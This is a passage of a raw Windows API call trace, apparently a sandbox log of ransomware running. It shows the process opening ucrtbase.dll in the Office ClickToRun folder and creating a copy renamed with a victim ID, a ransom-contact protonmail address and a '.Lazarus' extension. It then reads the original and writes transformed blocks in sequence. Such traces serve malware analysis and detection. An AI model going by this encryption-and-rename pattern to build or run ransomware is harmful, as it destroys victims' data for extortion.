(HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0097.819] AreFileApisANSI () returned 1 [0097.819] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0097.819] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x85c60 [0097.819] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x85c60, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\StreamServer.dll") returned 75 [0097.819] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\StreamServer.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\streamserver.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0097.819] GetFileType (hFile=0x418) returned 0x1 [0097.819] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85c60 | out: hHeap=0x20000) returned 1 [0097.819] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0097.819] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0097.820] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0097.820] CloseHandle (hObject=0x418) returned 1 [0097.820] AreFileApisANSI () returned 1 [0097.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0097.820] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x859e0 [0097.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x859e0, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\StreamServer.dll") returned 75 [0097.820] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\StreamServer.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\streamserver.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0097.820] GetLastError () returned 0x20 [0097.820] GetLastError () returned 0x20 [0097.820] SetLastError (dwErrCode=0x20) [0097.820] GetLastError () returned 0x20 [0097.820] SetLastError (dwErrCode=0x20) [0097.820] GetLastError () returned 0x20 [0097.820] SetLastError (dwErrCode=0x20) [0097.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x859e0 | out: hHeap=0x20000) returned 1 [0097.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0097.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0097.820] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0097.821] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.821] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.821] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80d542e1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80d542e1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0xefec0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="ucrtbase.dll", cAlternateFileName="")) returned 1 [0097.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0097.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0097.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0097.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35190 [0097.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0097.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35190 | out: hHeap=0x20000) returned 1 [0097.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0097.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0097.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0097.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0097.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ecf0 [0097.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0097.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ecf0 | out: hHeap=0x20000) returned 1 [0097.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8aeb0 [0097.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0097.821] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.821] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.821] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.821] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0097.821] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.821] AreFileApisANSI () returned 1 [0097.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ucrtbase.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ucrtbase.dll", lpUsedDefaultChar=0x0) returned 71 [0097.821] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0097.821] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.822] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0097.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0097.822] AreFileApisANSI () returned 1 [0097.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 71 [0097.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a530 [0097.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x8a530, cchWideChar=71 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ucrtbase.dll") returned 71 [0097.822] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ucrtbase.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\ucrtbase.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0097.822] GetFileType (hFile=0x418) returned 0x1 [0097.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0097.822] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0097.822] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0097.823] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0097.823] CloseHandle (hObject=0x418) returned 1 [0097.823] AreFileApisANSI () returned 1 [0097.823] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 71 [0097.823] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a400 [0097.823] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x8a400, cchWideChar=71 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ucrtbase.dll") returned 71 [0097.823] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ucrtbase.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\ucrtbase.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0097.823] GetFileType (hFile=0x418) returned 0x1 [0097.823] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0097.823] CloseHandle (hObject=0x418) returned 1 [0097.823] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.824] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0097.824] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.824] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.824] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.824] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0097.824] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.824] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.824] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0097.824] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.824] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.824] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.824] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0097.824] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.824] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.824] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0097.824] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0097.824] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0097.824] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0097.824] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0097.824] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0097.824] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.824] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0097.824] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0097.824] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0097.824] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.824] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0097.824] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.824] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0097.824] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0097.824] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0097.824] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.824] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.824] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.824] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0097.824] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.824] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.824] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0097.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0097.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0097.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0097.825] AreFileApisANSI () returned 1 [0097.825] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 71 [0097.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a368 [0097.825] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x8a368, cchWideChar=71 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ucrtbase.dll") returned 71 [0097.825] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ucrtbase.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\ucrtbase.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80d542e1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80d542e1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0xefec0)) returned 1 [0097.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0097.825] AreFileApisANSI () returned 1 [0097.825] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0097.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0097.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0097.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0097.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0097.825] GetLastError () returned 0x0 [0097.825] SetLastError (dwErrCode=0x0) [0097.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e0a0 [0097.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x49ca0 [0097.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b9c8 [0097.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d690 [0097.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5a0 [0097.826] GetLastError () returned 0x0 [0097.826] SetLastError (dwErrCode=0x0) [0097.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0097.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d6e0 [0097.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x77) returned 0x6a5b0 [0097.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d6e0 | out: hHeap=0x20000) returned 1 [0097.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb2) returned 0x55f20 [0097.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a5b0 | out: hHeap=0x20000) returned 1 [0097.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0097.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0097.826] AreFileApisANSI () returned 1 [0097.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x55f20, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 133 [0097.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10a) returned 0x8b8b0 [0097.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x55f20, cbMultiByte=-1, lpWideCharStr=0x8b8b0, cchWideChar=133 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ucrtbase.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 133 [0097.826] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ucrtbase.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\ucrtbase.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0097.827] GetFileType (hFile=0x418) returned 0x1 [0097.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b8b0 | out: hHeap=0x20000) returned 1 [0097.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0097.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0097.827] AreFileApisANSI () returned 1 [0097.827] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 71 [0097.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a5c8 [0097.827] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x8a5c8, cchWideChar=71 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ucrtbase.dll") returned 71 [0097.827] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ucrtbase.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\ucrtbase.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0097.827] GetFileType (hFile=0x368) returned 0x1 [0097.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0097.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a4b0 [0097.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0097.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0097.827] GetLastError () returned 0x0 [0097.827] SetLastError (dwErrCode=0x0) [0097.828] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0097.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35010 [0097.828] GetLastError () returned 0x0 [0097.828] SetLastError (dwErrCode=0x0) [0097.828] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35010 | out: hHeap=0x20000) returned 1 [0097.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35250 [0097.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x90450 [0097.828] ReadFile (in: hFile=0x368, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0097.829] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0097.830] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5d0 [0097.830] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x954b0 [0097.830] GetLastError () returned 0x0 [0097.830] SetLastError (dwErrCode=0x0) [0097.830] GetLastError () returned 0x0 [0097.830] SetLastError (dwErrCode=0x0) [0097.830] GetLastError () returned 0x0 [0097.830] SetLastError (dwErrCode=0x0) [0097.830] GetLastError () returned 0x0 [0097.831] SetLastError (dwErrCode=0x0) [0097.831] ReadFile (in: hFile=0x368, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.831] WriteFile (in: hFile=0x418, lpBuffer=0x954b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.835] GetLastError () returned 0x0 [0097.835] SetLastError (dwErrCode=0x0) [0097.835] GetLastError () returned 0x0 [0097.835] SetLastError (dwErrCode=0x0) [0097.835] GetLastError () returned 0x0 [0097.835] SetLastError (dwErrCode=0x0) [0097.835] GetLastError () returned 0x0 [0097.835] SetLastError (dwErrCode=0x0) [0097.835] ReadFile (in: hFile=0x368, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.836] WriteFile (in: hFile=0x418, lpBuffer=0x954b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) 